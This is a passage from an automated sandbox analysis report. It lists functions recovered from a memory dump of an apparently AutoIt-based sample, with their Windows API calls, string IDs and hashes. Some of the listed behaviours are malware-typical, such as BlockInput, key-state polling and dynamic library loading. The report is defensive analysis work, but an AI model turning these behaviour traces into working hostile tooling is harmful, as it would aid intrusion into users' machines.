                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: NameUser
                • String ID: X64
                • API String ID: 2645101109-893830106
                • Opcode ID: ca175a5ccb5274da0312064df930b24387601f6fcf41d9fb892de7a9e4477fc7
                • Instruction ID: 776c30489f92f80af01475c1152b21b898e00742aa2bb0538ae5c1033ffdabc2
                • Opcode Fuzzy Hash: ca175a5ccb5274da0312064df930b24387601f6fcf41d9fb892de7a9e4477fc7
                • Instruction Fuzzy Hash: BDD0C9B481111DEBCF90CBA0ECC8EED77BCBB04304F100191F106E2110D77095488B10
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00C1F3FF Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                Download Yara Rule
                APIs
                • BlockInput.USER32(00000001), ref: 00C1F41A
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: BlockInput
                • String ID:
                • API String ID: 3456056419-0
                • Opcode ID: 643fac34c053e56504633e4d5ce890c137423f441c31738fc3e5eab0034612a0
                • Instruction ID: 453898d0ee9dd3976362ce4097f642c905ccf3518643eecfae33de50bf35303f
                • Opcode Fuzzy Hash: 643fac34c053e56504633e4d5ce890c137423f441c31738fc3e5eab0034612a0
                • Instruction Fuzzy Hash: 98E048312042055FD710EF69D405A9BB7E8AF66760F00846AF95AC7351D670F841DBA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00C2306E Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON
                Download Yara Rule
                APIs
                • DestroyWindow.USER32(00000000), ref: 00C2309B
                • SystemParametersInfoW.USER32 ref: 00C231C7
                • SetRect.USER32 ref: 00C23206
                • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00C23216
                • CreateWindowExW.USER32 ref: 00C2325D
                • GetClientRect.USER32 ref: 00C23269
                • CreateWindowExW.USER32 ref: 00C232B2
                • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00C232C1
                • GetStockObject.GDI32(00000011), ref: 00C232D1
                • SelectObject.GDI32(00000000,00000000), ref: 00C232D5
                • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00C232E5
                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C232EE
                • DeleteDC.GDI32(00000000), ref: 00C232F7
                • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?,?,50000000), ref: 00C23323
                • SendMessageW.USER32(00000030,00000000,00000001), ref: 00C2333A
                • CreateWindowExW.USER32 ref: 00C2337A
                • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00C2338E
                • SendMessageW.USER32(00000404,00000001,00000000), ref: 00C2339F
                • CreateWindowExW.USER32 ref: 00C233D4
                • GetStockObject.GDI32(00000011), ref: 00C233DF
                • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00C233EA
                • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00C233F4
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                • API String ID: 2910397461-517079104
                • Opcode ID: 9bf4f988045eb6f2ab99d4252dd7bebb3e52e4be1dc9ced10216e87981d5e8d9
                • Instruction ID: db3e17b7ab77431f34c607d175b219644a26876c4c79e16482089d3ed50a26bd
                • Opcode Fuzzy Hash: 9bf4f988045eb6f2ab99d4252dd7bebb3e52e4be1dc9ced10216e87981d5e8d9
                • Instruction Fuzzy Hash: D5B13F71A10215AFEB14DF78DC85FAE7BB9EB45710F004155F915EB2A0DB74AD40CBA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00BA24C3 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON
                Download Yara Rule
                APIs
                • SystemParametersInfoW.USER32 ref: 00BA259A
                • GetSystemMetrics.USER32 ref: 00BA25A2
                • SystemParametersInfoW.USER32 ref: 00BA25CD
                • GetSystemMetrics.USER32 ref: 00BA25D5
                • GetSystemMetrics.USER32 ref: 00BA25FA
                • SetRect.USER32 ref: 00BA2617
                • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00BA2627
                • CreateWindowExW.USER32 ref: 00BA265A
                • SetWindowLongW.USER32 ref: 00BA266E
                • GetClientRect.USER32 ref: 00BA268C
                • GetStockObject.GDI32(00000011), ref: 00BA26A8
                • SendMessageW.USER32(00000000,00000030,00000000), ref: 00BA26B3
                  • Part of subcall function 00BA19CD: GetCursorPos.USER32(?,?,00000000,00000000,?,00BA26C6,00000000,000000FF,?,?,?), ref: 00BA19E1
                  • Part of subcall function 00BA19CD: ScreenToClient.USER32 ref: 00BA19FE
                  • Part of subcall function 00BA19CD: GetAsyncKeyState.USER32(00000001), ref: 00BA1A23
                  • Part of subcall function 00BA19CD: GetAsyncKeyState.USER32(00000002), ref: 00BA1A3D
                • SetTimer.USER32 ref: 00BA26DA
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                • String ID: AutoIt v3 GUI
                • API String ID: 1458621304-248962490
                • Opcode ID: 11aec6c034dcb66a0624f18873bf62ab1ea94063946d6325036742b073ccb2c5
                • Instruction ID: dc740dff34102e076744635c84cc963b39d33a747c414879d044009a1e9ba48a
                • Opcode Fuzzy Hash: 11aec6c034dcb66a0624f18873bf62ab1ea94063946d6325036742b073ccb2c5
                • Instruction Fuzzy Hash: DDB18B75A0020AAFDB14DFA8DC89BAE7BF5FB48710F104269FA1AA7290D770D940CF51
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00C3127D Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON
                Download Yara Rule
                APIs
                • CharUpperBuffW.USER32(?,?), ref: 00C31325
                • _wcslen.LIBCMT ref: 00C31360
                • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00C313B3
                • _wcslen.LIBCMT ref: 00C313E9
                • _wcslen.LIBCMT ref: 00C31465
                • _wcslen.LIBCMT ref: 00C314E0
                  • Part of subcall function 00BBFD60: _wcslen.LIBCMT ref: 00BBFD6B
                  • Part of subcall function 00C03478: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00C0348A
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: _wcslen$MessageSend$BuffCharUpper
                • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                • API String ID: 1103490817-4258414348
                • Opcode ID: af5af721e44e3b5cb2ec62fd1d75fab3903e48ebb94c808ef4258d79f73b6d9e
                • Instruction ID: 67ed6cac0460fd34d4ac527b8714f144ebdf707ccd4d0ed96a611a256479f55e
                • Opcode Fuzzy Hash: af5af721e44e3b5cb2ec62fd1d75fab3903e48ebb94c808ef4258d79f73b6d9e
                • Instruction Fuzzy Hash: A8E1CF712183419FCB10DF29C49186AB7E1FF99314F18499DF8A69B7A2DB30EE45CB81
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00C2D2F7 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: _wcslen$BuffCharUpper
                • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                • API String ID: 1256254125-909552448
                • Opcode ID: 1b07ca52933494e102e05a4d4ddf55b034b43f03e9f0747f274165a6290bf554
                • Instruction ID: 30d101448f7fb4514885a5d07acd430ae9ed800d75214a0205ab389c8fc22cc8
                • Opcode Fuzzy Hash: 1b07ca52933494e102e05a4d4ddf55b034b43f03e9f0747f274165a6290bf554
                • Instruction Fuzzy Hash: D9711672A005368BCB20EE7CED50ABE33E1AB71754B200568F8779B694EA74DE448390
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00C147D3 Relevance: 28.2, APIs: 8, Strings: 8, Instructions: 205COMMON
                Download Yara Rule
                APIs
                • CharLowerBuffW.USER32(?,?), ref: 00C14852
                • _wcslen.LIBCMT ref: 00C1485D
                • _wcslen.LIBCMT ref: 00C148B4
                • _wcslen.LIBCMT ref: 00C148F2
                • GetDriveTypeW.KERNEL32(?), ref: 00C14930
                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C14978
                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C149B3
                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C149E1
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: SendString_wcslen$BuffCharDriveLowerType
                • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                • API String ID: 1839972693-4113822522
                • Opcode ID: bd5de8b33dd857155c9923ecdaa6e42ddf3dfaf7dbd921a8f46bc44069f2734a
                • Instruction ID: cb821200f028042bafae60e269692e84893db62206bd8016a6a3d272e647b077
                • Opcode Fuzzy Hash: bd5de8b33dd857155c9923ecdaa6e42ddf3dfaf7dbd921a8f46bc44069f2734a
                • Instruction Fuzzy Hash: D871F5715083019FC714DF24C8909ABB7E4FF96768F00496CF8A5972A1EB30DE85DB91
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00C062AA Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON
                Download Yara Rule
                APIs
                • LoadIconW.USER32 ref: 00C062BD
                • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00C062CF
                • SetWindowTextW.USER32(?,?), ref: 00C062E6
                • GetDlgItem.USER32 ref: 00C062FB
                • SetWindowTextW.USER32(00000000,?), ref: 00C06301
                • GetDlgItem.USER32 ref: 00C06311
                • SetWindowTextW.USER32(00000000,?), ref: 00C06317
                • SendDlgItemMessageW.USER32 ref: 00C06338
                • SendDlgItemMessageW.USER32 ref: 00C06352
                • GetWindowRect.USER32 ref: 00C0635B
                • _wcslen.LIBCMT ref: 00C063C2
                • SetWindowTextW.USER32(?,?), ref: 00C063FE
                • GetDesktopWindow.USER32 ref: 00C06404
                • GetWindowRect.USER32 ref: 00C0640B
                • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00C06462
                • GetClientRect.USER32 ref: 00C0646F
                • PostMessageW.USER32(?,00000005,00000000,?), ref: 00C06494
                • SetTimer.USER32 ref: 00C064BE
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                • String ID:
                • API String ID: 895679908-0
                • Opcode ID: 11eaa9d6cd253cbc6d7ce4603b93c4b25ad2f409acd7a2e3dd584f5e96b31bc2
                • Instruction ID: 91e67420951022a7bb800e243eda499058e213d361c9f43643688cb8f02371c2
                • Opcode Fuzzy Hash: 11eaa9d6cd253cbc6d7ce4603b93c4b25ad2f409acd7a2e3dd584f5e96b31bc2
                • Instruction Fuzzy Hash: 10718B31900705AFDB20DFA9DE46BAEBBF5FF48705F100928E196A22E0D775EA54CB50
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00C2076B Relevance: 27.1, APIs: 18, Instructions: 128COMMON
                Download Yara Rule
                APIs
                • LoadCursorW.USER32(00000000,00007F89), ref: 00C20784
                • LoadCursorW.USER32(00000000,00007F8A), ref: 00C2078F
                • LoadCursorW.USER32(00000000,00007F00), ref: 00C2079A
                • LoadCursorW.USER32(00000000,00007F03), ref: 00C207A5
                • LoadCursorW.USER32(00000000,00007F8B), ref: 00C207B0
                • LoadCursorW.USER32(00000000,00007F01), ref: 00C207BB
                • LoadCursorW.USER32(00000000,00007F81), ref: 00C207C6
                • LoadCursorW.USER32(00000000,00007F88), ref: 00C207D1
                • LoadCursorW.USER32(00000000,00007F80), ref: 00C207DC
                • LoadCursorW.USER32(00000000,00007F86), ref: 00C207E7
                • LoadCursorW.USER32(00000000,00007F83), ref: 00C207F2
                • LoadCursorW.USER32(00000000,00007F85), ref: 00C207FD
                • LoadCursorW.USER32(00000000,00007F82), ref: 00C20808
                • LoadCursorW.USER32(00000000,00007F84), ref: 00C20813
                • LoadCursorW.USER32(00000000,00007F04), ref: 00C2081E
                • LoadCursorW.USER32(00000000,00007F02), ref: 00C20829
                • GetCursorInfo.USER32(?), ref: 00C20839
                • GetLastError.KERNEL32 ref: 00C2087B
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: Cursor$Load$ErrorInfoLast
                • String ID:
                • API String ID: 3215588206-0
                • Opcode ID: af26bfd826b4117cc89333c468dc4cd87707b070ed01accd93aad8c3790d49b7
                • Instruction ID: 4e831ec5a4fcc42e706d4dbc80dba83ca1ee50870a210bf14ae4b67311954625
                • Opcode Fuzzy Hash: af26bfd826b4117cc89333c468dc4cd87707b070ed01accd93aad8c3790d49b7
                • Instruction Fuzzy Hash: 594163B0E083196BDB10DFBA9C8985EBFE8FF04354B50452AE11DE7691DA78E901CF91
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00C24946 Relevance: 23.2, APIs: 11, Strings: 2, Instructions: 478libraryloaderCOMMON
                Download Yara Rule
                APIs
                • LoadLibraryA.KERNEL32(kernel32.dll,?,00C3DCD0), ref: 00C24A18
                • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00C24A2A
                • GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,?,00C3DCD0), ref: 00C24A4F
                • FreeLibrary.KERNEL32(00000000,?,00C3DCD0), ref: 00C24A9B
                • StringFromGUID2.OLE32(?,?,00000028,?,00C3DCD0), ref: 00C24B05
                • SysFreeString.OLEAUT32(00000009), ref: 00C24BBF
                • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00C24C25
                • SysFreeString.OLEAUT32(?), ref: 00C24C4F
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: FreeString$Library$AddressFileFromLoadModuleNamePathProcQueryType
                • String ID: GetModuleHandleExW$kernel32.dll
                • API String ID: 354098117-199464113
                • Opcode ID: 43564aa7424718882befdc188a2b5c1d78e4304922ed14965357f1797ee9e5c8
                • Instruction ID: 2e6d2f50f5de6d52cacba1a0a0156d6fe1bc73d1f8803ec776fcf732f307d883
                • Opcode Fuzzy Hash: 43564aa7424718882befdc188a2b5c1d78e4304922ed14965357f1797ee9e5c8
                • Instruction Fuzzy Hash: 36127D71A00114EFDB18DF94D884EAEBBB9FF45314F258098E919AF651C731EE42CBA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00C051E3 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 253COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                • String ID: ThumbnailClass
                • API String ID: 1311036022-1241985126
                • Opcode ID: 1a8cd2d1562e279a21cc477e0fb9da53260d0014c090abc03e91ec5323754ede
                • Instruction ID: 7db95ee990e5b9bbcb7b60c36932f2ab001feadd3917e286dce410a846cd7bb8
                • Opcode Fuzzy Hash: 1a8cd2d1562e279a21cc477e0fb9da53260d0014c090abc03e91ec5323754ede
                • Instruction Fuzzy Hash: A091A9711047059BDB04CF24C885BAB77A8FF84350F04846AFD9A9A0D6EB30EE85CFA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00C0C80C Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 190windowsleepCOMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: ItemMenu$Info$CheckCountRadioSleep
                • String ID: 0
                • API String ID: 1460738036-4108050209
                • Opcode ID: 6da26336bcf207504a50e3229dc64fe9677e8681e819bad879f678b510f4e430
                • Instruction ID: 8c55a97555c70a206a0bfa77bdf731a8506e5972740961b74484c22a63a3aa4c
                • Opcode Fuzzy Hash: 6da26336bcf207504a50e3229dc64fe9677e8681e819bad879f678b510f4e430
                • Instruction Fuzzy Hash: 7A616DB090025AABDF11CF68D8C8FAEBBA8FB05314F104215F961A32D1D734AE55DB60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00C0E3D7 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 178COMMON
                Download Yara Rule
                APIs
                • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00C0E3E9
                • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00C0E40F
                • _wcslen.LIBCMT ref: 00C0E419
                • _wcsstr.LIBVCRUNTIME ref: 00C0E469
                • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00C0E485
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
